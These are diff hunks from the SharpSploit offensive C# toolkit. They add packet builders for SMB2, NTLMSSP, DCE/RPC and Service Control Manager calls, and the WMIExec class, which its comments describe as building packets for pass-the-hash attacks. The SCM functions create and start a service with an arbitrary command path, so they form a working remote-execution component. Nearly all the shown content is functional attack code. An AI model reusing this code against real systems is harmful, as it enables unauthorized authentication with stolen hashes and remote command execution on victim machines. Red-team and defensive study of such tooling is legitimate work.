+            packet_SMB2WriteRequest.Add("SMB2WriteRequest_Channel", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_SMB2WriteRequest.Add("SMB2WriteRequest_RemainingBytes", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_SMB2WriteRequest.Add("SMB2WriteRequest_WriteChannelInfoOffset", new byte[] { 0x00, 0x00 });
+            packet_SMB2WriteRequest.Add("SMB2WriteRequest_WriteChannelInfoLength", new byte[] { 0x00, 0x00 });
+            packet_SMB2WriteRequest.Add("SMB2WriteRequest_Flags", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+
+
+            return packet_SMB2WriteRequest;
+        }
+        public static OrderedDictionary SMB2CloseRequest(byte[] packet_file_ID)
+        {
+            OrderedDictionary packet_SMB2CloseRequest = new OrderedDictionary();
+            packet_SMB2CloseRequest.Add("SMB2CloseRequest_StructureSize", new byte[] { 0x18, 0x00 });
+            packet_SMB2CloseRequest.Add("SMB2CloseRequest_Flags", new byte[] { 0x00, 0x00 });
+            packet_SMB2CloseRequest.Add("SMB2CloseRequest_Reserved", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_SMB2CloseRequest.Add("SMB2CloseRequest_FileID", packet_file_ID);
+            return packet_SMB2CloseRequest;
+        }
+        public static OrderedDictionary SMB2TreeDisconnectRequest()
+        {
+            OrderedDictionary packet_SMB2TreeDisconnectRequest = new OrderedDictionary();
+            packet_SMB2TreeDisconnectRequest.Add("SMB2TreeDisconnectRequest_StructureSize", new byte[] { 0x04, 0x00 });
+            packet_SMB2TreeDisconnectRequest.Add("SMB2TreeDisconnectRequest_Reserved", new byte[] { 0x00, 0x00 });
+            return packet_SMB2TreeDisconnectRequest;
+        }
+        public static OrderedDictionary SMB2SessionLogoffRequest()
+        {
+            OrderedDictionary packet_SMB2SessionLogoffRequest = new OrderedDictionary();
+            packet_SMB2SessionLogoffRequest.Add("SMB2SessionLogoffRequest_StructureSize", new byte[] { 0x04, 0x00 });
+            packet_SMB2SessionLogoffRequest.Add("SMB2SessionLogoffRequest_Reserved", new byte[] { 0x00, 0x00 });
+            return packet_SMB2SessionLogoffRequest;
+        }
+        public static OrderedDictionary NTLMSSPNegotiate(byte[] packet_negotiate_flags, byte[] packet_version)
+        {
+            byte[] packet_NTLMSSP_length;
+            //There may be issues here, we will see.
+            if (packet_version != null)
+            {
+                packet_NTLMSSP_length = BitConverter.GetBytes(32 + packet_version.Length);
+            }
+            else
+            {
+                packet_NTLMSSP_length = BitConverter.GetBytes(32);
+            }
+            byte[] packet_NTLMSSP_length2 = { packet_NTLMSSP_length[0] };
+
+            int packet_ASN_length_1 = Convert.ToInt32(packet_NTLMSSP_length[0]) + 32;
+            byte[] packet_ASN_length_1_2 = (BitConverter.GetBytes(packet_ASN_length_1));
+
+            int packet_ASN_length_2 = Convert.ToInt32(packet_NTLMSSP_length[0]) + 22;
+            byte[] packet_ASN_length_2_2 = (BitConverter.GetBytes(packet_ASN_length_2));
+
+            int packet_ASN_length_3 = Convert.ToInt32(packet_NTLMSSP_length[0]) + 20;
+            byte[] packet_ASN_length_3_2 = (BitConverter.GetBytes(packet_ASN_length_3));
+
+            int packet_ASN_length_4 = Convert.ToInt32(packet_NTLMSSP_length[0]) + 2;
+            byte[] packet_ASN_length_4_2 = BitConverter.GetBytes(packet_ASN_length_4);
+
+
+            OrderedDictionary packet_NTLMSSPNegotiate = new OrderedDictionary();
+            packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InitialContextTokenID", new byte[] { 0x60 }); // the ASN.1 key names are likely not all correct
+            packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InitialcontextTokenLength", new byte[] { packet_ASN_length_1_2[0] });
+            packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_ThisMechID", new byte[] { 0x06 });
+            packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_ThisMechLength", new byte[] { 0x06 });
+            packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_OID", new byte[] { 0x2b, 0x06, 0x01, 0x05, 0x05, 0x02 });
+            packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InnerContextTokenID", new byte[] { 0xa0 });
+            packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InnerContextTokenLength", new byte[] { packet_ASN_length_2_2[0] });
+            packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InnerContextTokenID2", new byte[] { 0x30 });
+            packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InnerContextTokenLength2", new byte[] { packet_ASN_length_3_2[0] });
+            packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesID", new byte[] { 0xa0 });
+            packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesLength", new byte[] { 0x0e });
+            packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesID2", new byte[] { 0x30 });
+            packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesLength2", new byte[] { 0x0c });
+            packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesID3", new byte[] { 0x06 });
+            packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesLength3", new byte[] { 0x0a });
+            packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechType", new byte[] { 0x2b, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x02, 0x02, 0x0a });
+            packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTokenID", new byte[] { 0xa2 });
+            packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTokenLength", new byte[] { packet_ASN_length_4_2[0] });
+            packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_NTLMSSPID", new byte[] { 0x04 });
+            packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_NTLMSSPLength", new byte[] { packet_NTLMSSP_length2[0] });
+            packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_Identifier", new byte[] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00 });
+            packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MessageType", new byte[] { 0x01, 0x00, 0x00, 0x00 });
+            packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_NegotiateFlags", packet_negotiate_flags);
+            packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_CallingWorkstationDomain", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+            packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_CallingWorkstationName", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+
+            if (packet_version != null)
+            {
+                packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_Version", packet_version);
+            }
+
+            return packet_NTLMSSPNegotiate;
+
+
+        }
+        public static OrderedDictionary NTLMSSPAuth(byte[] packet_NTLM_response)
+        {
+
+
+            byte[] packet_NTLMSSP_length = BitConverter.GetBytes(packet_NTLM_response.Length);
+            packet_NTLMSSP_length = new byte[] { packet_NTLMSSP_length[1], packet_NTLMSSP_length[0] };
+            byte[] packet_ASN_length_1 = BitConverter.GetBytes(packet_NTLM_response.Length + 12);
+            byte[] packet_ASN_length_1_2 = { packet_ASN_length_1[1], packet_ASN_length_1[0] };
+            byte[] packet_ASN_length_2 = BitConverter.GetBytes(packet_NTLM_response.Length + 8);
+            byte[] packet_ASN_length_2_2 = { packet_ASN_length_2[1], packet_ASN_length_2[0] };
+            byte[] packet_ASN_length_3 = BitConverter.GetBytes(packet_NTLM_response.Length + 4);
+            byte[] packet_ASN_length_3_2 = { packet_ASN_length_3[1], packet_ASN_length_3[0] };
+
+
+
+            OrderedDictionary packet_NTLMSSPAuth = new OrderedDictionary();
+            packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNID", new byte[] { 0xa1, 0x82 });
+            packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNLength", packet_ASN_length_1_2);
+            packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNID2", new byte[] { 0x30, 0x82 });
+            packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNLength2", packet_ASN_length_2_2);
+            packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNID3", new byte[] { 0xa2, 0x82 });
+            packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNLength3", packet_ASN_length_3_2);
+            packet_NTLMSSPAuth.Add("NTLMSSPAuth_NTLMSSPID", new byte[] { 0x04, 0x82 });
+            packet_NTLMSSPAuth.Add("NTLMSSPAuth_NTLMSSPLength", packet_NTLMSSP_length);
+            packet_NTLMSSPAuth.Add("NTLMSSPAuth_NTLMResponse", packet_NTLM_response);
+
+            return packet_NTLMSSPAuth;
+
+        }
+        public static OrderedDictionary RPCBind(int packet_call_ID, byte[] packet_max_frag, byte[] packet_num_ctx_items, byte[] packet_context_ID, byte[] packet_UUID, byte[] packet_UUID_version)
+        {
+
+            byte[] packet_call_ID_bytes = BitConverter.GetBytes(packet_call_ID);
+
+            OrderedDictionary packet_RPCBind = new OrderedDictionary();
+            packet_RPCBind.Add("RPCBind_Version", new byte[] { 0x05 });
+            packet_RPCBind.Add("RPCBind_VersionMinor", new byte[] { 0x00 });
+            packet_RPCBind.Add("RPCBind_PacketType", new byte[] { 0x0b });
+            packet_RPCBind.Add("RPCBind_PacketFlags", new byte[] { 0x03 });
+            packet_RPCBind.Add("RPCBind_DataRepresentation", new byte[] { 0x10, 0x00, 0x00, 0x00 });
+            packet_RPCBind.Add("RPCBind_FragLength", new byte[] { 0x48, 0x00 });
+            packet_RPCBind.Add("RPCBind_AuthLength", new byte[] { 0x00, 0x00 });
+            packet_RPCBind.Add("RPCBind_CallID", packet_call_ID_bytes);
+            packet_RPCBind.Add("RPCBind_MaxXmitFrag", new byte[] { 0xb8, 0x10 });
+            packet_RPCBind.Add("RPCBind_MaxRecvFrag", new byte[] { 0xb8, 0x10 });
+            packet_RPCBind.Add("RPCBind_AssocGroup", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_RPCBind.Add("RPCBind_NumCtxItems", packet_num_ctx_items);
+            packet_RPCBind.Add("RPCBind_Unknown", new byte[] { 0x00, 0x00, 0x00 });
+            packet_RPCBind.Add("RPCBind_ContextID", packet_context_ID);
+            packet_RPCBind.Add("RPCBind_NumTransItems", new byte[] { 0x01 });
+            packet_RPCBind.Add("RPCBind_Unknown2", new byte[] { 0x00 });
+            packet_RPCBind.Add("RPCBind_Interface", packet_UUID);
+            packet_RPCBind.Add("RPCBind_InterfaceVer", packet_UUID_version);
+            packet_RPCBind.Add("RPCBind_InterfaceVerMinor", new byte[] { 0x00, 0x00 });
+            packet_RPCBind.Add("RPCBind_TransferSyntax", new byte[] { 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60 });
+            packet_RPCBind.Add("RPCBind_TransferSyntaxVer", new byte[] { 0x02, 0x00, 0x00, 0x00 });
+
+
+            if (packet_num_ctx_items[0] == 2)
+            {
+                packet_RPCBind.Add("RPCBind_ContextID2", new byte[] { 0x01, 0x00 });
+                packet_RPCBind.Add("RPCBind_NumTransItems2", new byte[] { 0x01 });
+                packet_RPCBind.Add("RPCBind_Unknown3", new byte[] { 0x00 });
+                packet_RPCBind.Add("RPCBind_Interface2", new byte[] { 0xc4, 0xfe, 0xfc, 0x99, 0x60, 0x52, 0x1b, 0x10, 0xbb, 0xcb, 0x00, 0xaa, 0x00, 0x21, 0x34, 0x7a });
+                packet_RPCBind.Add("RPCBind_InterfaceVer2", new byte[] { 0x00, 0x00 });
+                packet_RPCBind.Add("RPCBind_InterfaceVerMinor2", new byte[] { 0x00, 0x00 });
+                packet_RPCBind.Add("RPCBind_TransferSyntax2", new byte[] { 0x2c, 0x1c, 0xb7, 0x6c, 0x12, 0x98, 0x40, 0x45, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+                packet_RPCBind.Add("RPCBind_TransferSyntaxVer2", new byte[] { 0x01, 0x00, 0x00, 0x00 });
+            }
+            else if (packet_num_ctx_items[0] == 3)
+            {
+                packet_RPCBind.Add("RPCBind_ContextID2", new byte[] { 0x01, 0x00 });
+                packet_RPCBind.Add("RPCBind_NumTransItems2", new byte[] { 0x01 });
+                packet_RPCBind.Add("RPCBind_Unknown3", new byte[] { 0x00 });
+                packet_RPCBind.Add("RPCBind_Interface2", new byte[] { 0x43, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 });
+                packet_RPCBind.Add("RPCBind_InterfaceVer2", new byte[] { 0x00, 0x00 });
+                packet_RPCBind.Add("RPCBind_InterfaceVerMinor2", new byte[] { 0x00, 0x00 });
+                packet_RPCBind.Add("RPCBind_TransferSyntax2", new byte[] { 0x33, 0x05, 0x71, 0x71, 0xba, 0xbe, 0x37, 0x49, 0x83, 0x19, 0xb5, 0xdb, 0xef, 0x9c, 0xcc, 0x36 });
+                packet_RPCBind.Add("RPCBind_TransferSyntaxVer2", new byte[] { 0x01, 0x00, 0x00, 0x00 });
+                packet_RPCBind.Add("RPCBind_ContextID3", new byte[] { 0x02, 0x00 });
+                packet_RPCBind.Add("RPCBind_NumTransItems3", new byte[] { 0x01 });
+                packet_RPCBind.Add("RPCBind_Unknown4", new byte[] { 0x00 });
+                packet_RPCBind.Add("RPCBind_Interface3", new byte[] { 0x43, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 });
+                packet_RPCBind.Add("RPCBind_InterfaceVer3", new byte[] { 0x00, 0x00 });
+                packet_RPCBind.Add("RPCBind_InterfaceVerMinor3", new byte[] { 0x00, 0x00 });
+                packet_RPCBind.Add("RPCBind_TransferSyntax3", new byte[] { 0x2c, 0x1c, 0xb7, 0x6c, 0x12, 0x98, 0x40, 0x45, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+                packet_RPCBind.Add("RPCBind_TransferSyntaxVer3", new byte[] { 0x01, 0x00, 0x00, 0x00 });
+                packet_RPCBind.Add("RPCBind_AuthType", new byte[] { 0x0a });
+                packet_RPCBind.Add("RPCBind_AuthLevel", new byte[] { 0x04 });
+                packet_RPCBind.Add("RPCBind_AuthPadLength", new byte[] { 0x00 });
+                packet_RPCBind.Add("RPCBind_AuthReserved", new byte[] { 0x00 });
+                packet_RPCBind.Add("RPCBind_ContextID4", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                packet_RPCBind.Add("RPCBind_Identifier", new byte[] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00 });
+                packet_RPCBind.Add("RPCBind_MessageType", new byte[] { 0x01, 0x00, 0x00, 0x00 });
+                packet_RPCBind.Add("RPCBind_NegotiateFlags", new byte[] { 0x97, 0x82, 0x08, 0xe2 });
+                packet_RPCBind.Add("RPCBind_CallingWorkstationDomain", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+                packet_RPCBind.Add("RPCBind_CallingWorkstationName", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+                packet_RPCBind.Add("RPCBind_OSVersion", new byte[] { 0x06, 0x01, 0xb1, 0x1d, 0x00, 0x00, 0x00, 0x0f });
+            }
+
+            if (packet_call_ID == 3)
+            {
+                packet_RPCBind.Add("RPCBind_AuthType", new byte[] { 0x0a });
+                packet_RPCBind.Add("RPCBind_AuthLevel", new byte[] { 0x02 });
+                packet_RPCBind.Add("RPCBind_AuthPadLength", new byte[] { 0x00 });
+                packet_RPCBind.Add("RPCBind_AuthReserved", new byte[] { 0x00 });
+                packet_RPCBind.Add("RPCBind_ContextID3", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                packet_RPCBind.Add("RPCBind_Identifier", new byte[] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00 });
+                packet_RPCBind.Add("RPCBind_MessageType", new byte[] { 0x01, 0x00, 0x00, 0x00 });
+                packet_RPCBind.Add("RPCBind_NegotiateFlags", new byte[] { 0x97, 0x82, 0x08, 0xe2 });
+                packet_RPCBind.Add("RPCBind_CallingWorkstationDomain", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+                packet_RPCBind.Add("RPCBind_CallingWorkstationName", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+                packet_RPCBind.Add("RPCBind_OSVersion", new byte[] { 0x06, 0x01, 0xb1, 0x1d, 0x00, 0x00, 0x00, 0x0f });
+            }
+
+            return packet_RPCBind;
+        }
+        public static OrderedDictionary RPCRequest(byte[] packet_flags, int packet_service_length, int packet_auth_length, int packet_auth_padding, byte[] packet_call_ID, byte[] packet_context_ID, byte[] packet_opnum, byte[] packet_data)
+        {
+            int packet_full_auth_length;
+            byte[] packet_write_length;
+            byte[] packet_alloc_hint;
+            if (packet_auth_length > 0)
+            {
+                packet_full_auth_length = packet_auth_length + packet_auth_padding + 8;
+            }
+            else
+            {
+                packet_full_auth_length = 0;
+            }
+
+
+            if (packet_data != null)
+            {
+                packet_write_length = BitConverter.GetBytes(packet_service_length + 24 + packet_full_auth_length + packet_data.Length);
+                packet_alloc_hint = BitConverter.GetBytes(packet_service_length + packet_data.Length);
+            }
+            else
+            {
+                packet_write_length = BitConverter.GetBytes(packet_service_length + 24 + packet_full_auth_length);
+                packet_alloc_hint = BitConverter.GetBytes(packet_service_length);
+
+            }
+
+            byte[] packet_frag_length = { packet_write_length[0], packet_write_length[1] };
+            byte[] packet_auth_length2 = BitConverter.GetBytes(packet_auth_length);
+            byte[] packet_auth_length3 = { packet_auth_length2[0], packet_auth_length2[1] };
+
+            OrderedDictionary packet_RPCRequest = new OrderedDictionary();
+            packet_RPCRequest.Add("RPCRequest_Version", new byte[] { 0x05 });
+            packet_RPCRequest.Add("RPCRequest_VersionMinor", new byte[] { 0x00 });
+            packet_RPCRequest.Add("RPCRequest_PacketType", new byte[] { 0x00 });
+            packet_RPCRequest.Add("RPCRequest_PacketFlags", packet_flags);
+            packet_RPCRequest.Add("RPCRequest_DataRepresentation", new byte[] { 0x10, 0x00, 0x00, 0x00 });
+            packet_RPCRequest.Add("RPCRequest_FragLength", packet_frag_length);
+            packet_RPCRequest.Add("RPCRequest_AuthLength", packet_auth_length3);
+            packet_RPCRequest.Add("RPCRequest_CallID", packet_call_ID);
+            packet_RPCRequest.Add("RPCRequest_AllocHint", packet_alloc_hint);
+            packet_RPCRequest.Add("RPCRequest_ContextID", packet_context_ID);
+            packet_RPCRequest.Add("RPCRequest_Opnum", packet_opnum);
+
+            if (packet_data != null && packet_data.Length > 0)
+            {
+                packet_RPCRequest.Add("RPCRequest_Data", packet_data);
+            }
+
+            return packet_RPCRequest;
+
+        }
+
+
+
+        //Look into to see if this can be simplified with what we already have.
+        public static OrderedDictionary SCMOpenSCManagerW(byte[] packet_service, byte[] packet_service_length)
+        {
+            byte[] packet_write_length = BitConverter.GetBytes(packet_service.Length + 92);
+            byte[] packet_frag_length = { packet_write_length[0], packet_write_length[1] };
+            byte[] packet_alloc_hint = BitConverter.GetBytes(packet_service.Length + 68);
+            Random r = new Random();
+            byte[] packet_referent_init = new byte[2];
+            r.NextBytes(packet_referent_init);
+            byte[] nulls = { 0x00, 0x00 };
+            byte[] packet_referent_ID1 = Utilities.CombineByteArray(packet_referent_init, nulls);
+            byte[] packet_referent_init2 = new byte[2];
+            r.NextBytes(packet_referent_init2);
+            byte[] packet_referent_ID2 = Utilities.CombineByteArray(packet_referent_init2, nulls);
+
+
+            OrderedDictionary packet_SCMOpenSCManagerW = new OrderedDictionary();
+            packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName_ReferentID", packet_referent_ID1);
+            packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName_MaxCount", packet_service_length);
+            packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName_Offset", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName_ActualCount", packet_service_length);
+            packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName", packet_service);
+            packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database_ReferentID", packet_referent_ID2);
+            packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database_NameMaxCount", new byte[] { 0x0f, 0x00, 0x00, 0x00 });
+            packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database_NameOffset", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database_NameActualCount", new byte[] { 0x0f, 0x00, 0x00, 0x00 });
+            packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database", new byte[] { 0x53, 0x00, 0x65, 0x00, 0x72, 0x00, 0x76, 0x00, 0x69, 0x00, 0x63, 0x00, 0x65, 0x00, 0x73, 0x00, 0x41, 0x00, 0x63, 0x00, 0x74, 0x00, 0x69, 0x00, 0x76, 0x00, 0x65, 0x00, 0x00, 0x00 });
+            packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Unknown", new byte[] { 0xbf, 0xbf });
+            packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_AccessMask", new byte[] { 0x3f, 0x00, 0x00, 0x00 });
+
+            return packet_SCMOpenSCManagerW;
+        }
+        public static OrderedDictionary SCMCreateServiceW(byte[] packet_context_handle, byte[] packet_service, byte[] packet_service_length, byte[] packet_command, byte[] packet_command_length)
+        {
+            Random r = new Random();
+            byte[] packet_referent_init = new byte[2];
+            r.NextBytes(packet_referent_init);
+            byte[] nulls = { 0x00, 0x00 };
+            byte[] packet_referent_ID = new byte[4];
+            Buffer.BlockCopy(packet_referent_init, 0, packet_referent_ID, 0, packet_referent_init.Length);
+            Buffer.BlockCopy(nulls, 0, packet_referent_ID, packet_referent_init.Length, nulls.Length);
+            OrderedDictionary packet_SCMCreateServiceW = new OrderedDictionary();
+            packet_SCMCreateServiceW.Add("SCMCreateServiceW_ContextHandle", packet_context_handle);
+            packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceName_MaxCount", packet_service_length);
+            packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceName_Offset", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceName_ActualCount", packet_service_length);
+            packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceName", packet_service);
+            packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName_ReferentID", packet_referent_ID);
+            packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName_MaxCount", packet_service_length);
+            packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName_Offset", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName_ActualCount", packet_service_length);
+            packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName", packet_service);
+            packet_SCMCreateServiceW.Add("SCMCreateServiceW_AccessMask", new byte[] { 0xff, 0x01, 0x0f, 0x00 });
+            packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceType", new byte[] { 0x10, 0x00, 0x00, 0x00 });
+            packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceStartType", new byte[] { 0x03, 0x00, 0x00, 0x00 });
+            packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceErrorControl", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_SCMCreateServiceW.Add("SCMCreateServiceW_BinaryPathName_MaxCount", packet_command_length);
+            packet_SCMCreateServiceW.Add("SCMCreateServiceW_BinaryPathName_Offset", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_SCMCreateServiceW.Add("SCMCreateServiceW_BinaryPathName_ActualCount", packet_command_length);
+            packet_SCMCreateServiceW.Add("SCMCreateServiceW_BinaryPathName", packet_command);
+            packet_SCMCreateServiceW.Add("SCMCreateServiceW_NULLPointer", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_SCMCreateServiceW.Add("SCMCreateServiceW_TagID", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_SCMCreateServiceW.Add("SCMCreateServiceW_NULLPointer2", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_SCMCreateServiceW.Add("SCMCreateServiceW_DependSize", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_SCMCreateServiceW.Add("SCMCreateServiceW_NULLPointer3", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_SCMCreateServiceW.Add("SCMCreateServiceW_NULLPointer4", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            packet_SCMCreateServiceW.Add("SCMCreateServiceW_PasswordSize", new byte[] { 0x00, 0x00, 0x00, 0x00 });
+
+            return packet_SCMCreateServiceW;
+        }
+        public static OrderedDictionary SCMStartServiceW(byte[] packet_context_handle)
+        {
+            OrderedDictionary packet_SCMStartServiceW = new OrderedDictionary();
+            packet_SCMStartServiceW.Add("SCMStartServiceW_ContextHandle", packet_context_handle);
+            packet_SCMStartServiceW.Add("SCMStartServiceW_Unknown", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
+            return packet_SCMStartServiceW;
+        }
+        public static OrderedDictionary SCMDeleteServiceW(byte[] packet_context_handle)
+        {
+            OrderedDictionary packet_SCMDeleteServiceW = new OrderedDictionary();
+            packet_SCMDeleteServiceW.Add("SCMDeleteServiceW_ContextHandle", packet_context_handle);
+
+            return packet_SCMDeleteServiceW;
+        }
+        public static OrderedDictionary SCMCloseServiceHandle(byte[] packet_context_handle)
+        {
+            OrderedDictionary packet_SCM_CloseServiceW = new OrderedDictionary();
+            packet_SCM_CloseServiceW.Add("SCMCloseServiceW_ContextHandle", packet_context_handle);
+
+            return packet_SCM_CloseServiceW;
+        }
+        #endregion
+
+    }
+}

--- a/SharpSploit/Execution/PassTheHash/WMIExec.cs
+++ b/SharpSploit/Execution/PassTheHash/WMIExec.cs
@@ -1,6 +1,7 @@
 ﻿using SharpSploit.Misc;
 using System;
 using System.Collections.Specialized;
+using System.Linq;
 using System.Text;
 
 namespace SharpSploit.Execution
@@ -294,12 +295,11 @@ namespace SharpSploit.Execution
             byte[] packet_target_unicode = Encoding.Unicode.GetBytes(packet_target);
             byte[] packet_target_length = BitConverter.GetBytes(packet_target.Length + 1);
             double bytesize = (Math.Truncate((double)packet_target_unicode.Length / 8 + 1) * 8) - packet_target_unicode.Length;
-            byte[] nulls = new byte[Convert.ToInt32(bytesize)];
-            packet_target_unicode = Utilities.CombineByteArray(packet_target_unicode, nulls);
+            packet_target_unicode = packet_target_unicode.Concat(new byte[Convert.ToInt32(bytesize)]).ToArray();
             byte[] packet_cntdata = BitConverter.GetBytes(packet_target_unicode.Length + 720);
             byte[] packet_size = BitConverter.GetBytes(packet_target_unicode.Length + 680);
             byte[] packet_total_size = BitConverter.GetBytes(packet_target_unicode.Length + 664);
-            byte[] packet_private_header = Utilities.CombineByteArray((BitConverter.GetBytes(packet_target_unicode.Length + 40)), new byte[] { 0x00, 0x00, 0x00, 0x00 });
+            byte[] packet_private_header = BitConverter.GetBytes(packet_target_unicode.Length + 40).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
             byte[] packet_property_data_size = BitConverter.GetBytes(packet_target_unicode.Length + 56);
 
             OrderedDictionary packet_DCOMRemoteCreateInstance = new OrderedDictionary();

--- a/SharpSploit/Execution/PassTheHash/WMIExec.cs
+++ b/SharpSploit/Execution/PassTheHash/WMIExec.cs
@@ -1,0 +1,428 @@
+﻿using SharpSploit.Misc;
+using System;
+using System.Collections.Specialized;
+using System.Text;
+
+namespace SharpSploit.Execution
+{
+    public class WMIExec
+    {
+        /// <summary>
+        /// WMIExec contains all of the functions used to manually create SMB Packet Structures for Pass the Hash attacks.
+        /// </summary>
+        /// <remarks>
+        /// Based Heavily on Kevin Robertsons Invoke-TheHash toolset (Found
+        /// at https://github.com/Kevin-Robertson/Invoke-TheHash)
+        /// </remarks>
+        
+        public static OrderedDictionary RPCBind(int packet_call_ID, byte[] packet_max_frag, byte[] packet_num_ctx_items, byte[] packet_context_ID, byte[] packet_UUID, byte[] packet_UUID_version)
+        {
+
+            byte[] packet_call_ID_bytes = BitConverter.GetBytes(packet_call_ID);
+
+            OrderedDictionary packet_RPCBind = new OrderedDictionary();
+            packet_RPCBind.Add("RPCBind_Version", new byte[] { 0x05 });
+            packet_RPCBind.Add("RPCBind_VersionMinor", new byte[] { 0x00 });
+            packet_RPCBind.Add("RPCBind_PacketType", new byte[] { 0x0b });
+            packet_RPCBind.Add("RPCBind_PacketFlags", new byte[] { 0x03 });
+            packet_RPCBind.Add("RPCBind_DataRepresentation", new byte[] { 0x10, 0x00, 0x00, 0x00 });
+            packet_RPCBind.Add("RPCBind_FragLength", new byte[] { 0x48, 0x00 });
+            packet_RPCBind.Add("RPCBind_AuthLength", new byte[] { 0x00, 0x00 });
+            packet_RPCBind.Add("RPCBind_CallID", packet_call_ID_bytes);
+            packet_RPCBind.Add("RPCBind_MaxXmitFrag", new byte[] { 0xb8, 0x10 });
